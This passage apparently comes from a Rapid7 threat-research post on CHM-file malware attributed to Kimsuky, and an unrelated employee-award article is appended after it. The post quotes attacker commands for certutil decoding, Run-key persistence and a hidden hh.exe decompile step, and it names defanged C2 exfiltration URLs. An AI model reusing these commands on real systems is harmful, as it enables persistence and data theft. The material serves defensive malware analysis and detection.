• start /MIN certutil -decode "%USERPROFILE%\Links\MXFhejJ3c3gzZWRjA.dat" "%USERPROFILE%\Links\MXFhejJ3c3gzZWRjA.vbs": This uses the certutil utility, a legitimate Windows tool, to decode the Base64-encoded .dat file back into a .vbs (VBScript) file. The /MIN flag starts the process minimized to reduce suspicion.

4. Persistence via Registry Modification (T1547.001)

• :start /MIN REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Document /t REG_SZ /d "%USERPROFILE%\Links\MXFhejJ3c3gzZWRjA.vbs" /f: This adds a new entry to the Windows Registry under the Run key for the current user (HKCU stands for HKEY_CURRENT_USER). This registry path is used by Windows to determine which programs should run automatically at startup. The command ensures that the decoded VBScript runs every time the user logs in, achieving persistence on the infected system.

But what is downloaded from the URL, decoded and written to that VBS file? The URL of the Command and Control Server is hosting an HTML page that contains VBS code:

Analyzing the code, it does several things on the victim’s machine:

The function ‘SyInf()’ collects basic system information using WMI (Windows Management Instrumentation) and constructs a string with all these details. What is gathered:

• Computer name, owner, manufacturer, model, system type.
• Operating system details, version, build number, total visible memory.
• Processor details, including caption and clock speed.

Other functions in the code collect the running processes on the system, recent Word files, and lists directories and files of specific folders. In our case, the actor was interested in the content of the Downloads folder.

After gathering the requested information from the code, it is all encoded in the Base64 format, stored in the file ‘info.txt’ and exfiltrated to the remote server:

ui = "00701111.000webhostapp.com/wp-extra"

Once the information is sent, the C2 responds with the following message:

This C2 server is still active and while we have seen activity since September 2023, we also observed activity in 2024.

New Campaign Discovered

Pivoting some of the unique strings in the ‘stealer code’ and hunting for more CHM files, we discovered more files — some also going back to H2 2023, but also 2024 hits.

In VirusTotal we discovered the following file:

The file is a VBS script and it contains similar code to what we described earlier on the information gathering script above. Many components are the same, with small differences in what type of data is being gathered.

The biggest difference, which makes sense, is a different C2 server. Below is the full path of when the VBS script ran and concatenated the path:

hxxp://gosiweb.gosiclass[.]com/m/gnu/convert/html/com/list.php?query=6

The modus operandi and reusing of code and tools are showing that the threat actor is actively using and refining/reshaping its techniques and tactics to gather intelligence from victims.

Still More? Yes, Another Approach Discovered

Using the characteristics of the earlier discovered CHM files, we developed internal Yara rules that were hunting, from which we discovered the following CHM file:

In this particular case, multiple .bat files and VBS scripts are present:

In similar fashion, an HTML file in the directory contains hidden code:

style="visibility:hidden;"><param name="Command" value="ShortCut"><param name="Button" value="Bitmap:shortcut"><param name="Item1" value=",hh,-decompile C:\\Users\\Public\\Libraries '+d+'

The background png file shows (translated) the following information:

Once the CHM file is executed, it drops all files in the C:\\Users\\Public\\Libraries\ directory and starts running. It starts with creating a persistence scheduled task with the “\2034923.bat” file:

The VBS script will create a Service and then the other .bat files are executed, each with different functions.

The “9583423.bat” script will gather information from the system and store them in text files:

In the above code, when information is gathered, the file is called by the ‘1295049.bat’ script, which contains the Powershell code to setup the connection to the C2 server with the right path, Base64 encode the stream, and transfer:

Combining the code from previous .bat file and this code, the path to the C2 is created:

hxxps://niscarea[.]com/in.php?cn=[base64]&fn=[DateTime]

The gathered files containing the information about the system will be Base64 encoded, zipped and sent to the C2. After sending, the files are deleted from the local system.

The sys.txt file will contain information about the system of the victim such as OS, CPU architecture, etc. Here is a short example of the content:

The overall flow of this attack can be simplified in this visualization:

Attack Prevalence

Since this is an active campaign, tracking prevalence is based at the time of this writing. However, Rapid7 Labs telemetry enables us to confirm that we have identified targeted attacks against entities based in South Korea. Moreover, as we apply our approach to determine attribution such as the overlap in code and tactics, we have attributed this campaign with a moderate confidence* to the Kimsuky group.

All IoCs are available freely within our Rapid7 Labs repository here.

Rapid7 Customers

InsightIDR and Managed Detection and Response (MDR) customers have existing detection coverage through Rapid7's expansive library of detection rules. Rapid7 recommends installing the Insight Agent on all applicable hosts to ensure visibility into suspicious processes and proper detection coverage. Below is a non-exhaustive list of detections deployed and alerting on activity related to these techniques and research:

Persistence - Run Key Added by Reg.exe

Suspicious Process - HH.exe Spawns Child Process

Suspicious Process - CHM File Runs CMD.exe to Run Certutil

Persistence - vbs Script Added to Registry Run Key

*In threat research terms, “moderate confidence” means that we have a significant amount of evidence that the activity we are observing is similar to what we have observed from a specific group or actor in the past; however, there is always a chance someone is mimicking behavior. Hence, we use “moderate” instead of “high” confidence.

At the 2024 Women Who Code She Rocks Awards, Rapid7 Software Engineer II Ciara Cullinan was recognized with their ‘Community Trailblazer’ award.

According to Women Who Code, “This award celebrates the efforts of someone who brings people together and creates genuine connections in our tech community. Whether this is online or in-person, this person demonstrates exceptional commitment to building a thriving and inclusive community.”

When it comes to building community, Ciara is a true champion who is consistently looking for ways to establish and grow meaningful connections among her team, across the organization, and in the local tech industry. Whether it’s encouraging engagement in various slack channels with ‘water cooler’ questions and ice breakers, or driving Rapid7’s sponsorship of Women Techmakers, she’s proactively seeking out ways to bring people together while growing her own network in the process.

“I think a lot of times - and especially for women - we focus on perfection in our work. We can be hesitant to share things until we have it 100% figured out ourselves. However, when we are able to build strong personal connections with our colleagues, or even others in the industry, the bravery to put something forward or ask for feedback comes much easier. That connection opens up the door to have honest conversations, share ideas, and provide feedback. This is where we can work together to drive impact and grow our skills, which lead to rewarding career experiences and growth.”

In addition to her role as an engineer, Ciara is an active member of Rapid7 Women. Rapid7 Women is an employee resource group that aims to support, enable, and empower all employees identifying as women to bring their best, true selves to work every day through community, action, and activism. Ciara actively contributes to this mission by helping build global and local initiatives for the group. As mentioned in her nomination submission, “Ciara collaborates with colleagues from around the globe, in different business units and roles to build a Women program that caters to supporting not only Women identifying individuals, but also seeks to educate allies on how to be a culture contributor exhibiting inclusive leadership traits.”

Ciara also highlights the importance of bringing more women into the tech industry, and how organizations like Women Who Code can make a difference. “In my role I am one of two women on the team. As technology continues to evolve and things like Artificial Intelligence become part of our everyday life, it’s important to get more women involved in the field to combat any implicit bias in the things that are being built. Bringing more diverse perspectives into a team can also help drive innovation and help organizations work through challenges more efficiently. Awards and programs like this help showcase what’s possible for the next generation of women, allowing them see and then realize the potential a career in tech could hold for them.”

To learn more about Women Who Code’s Belfast community, visit their website.

To learn more about Rapid7’s culture, and our Rapid Impact Groups, visit our careers page.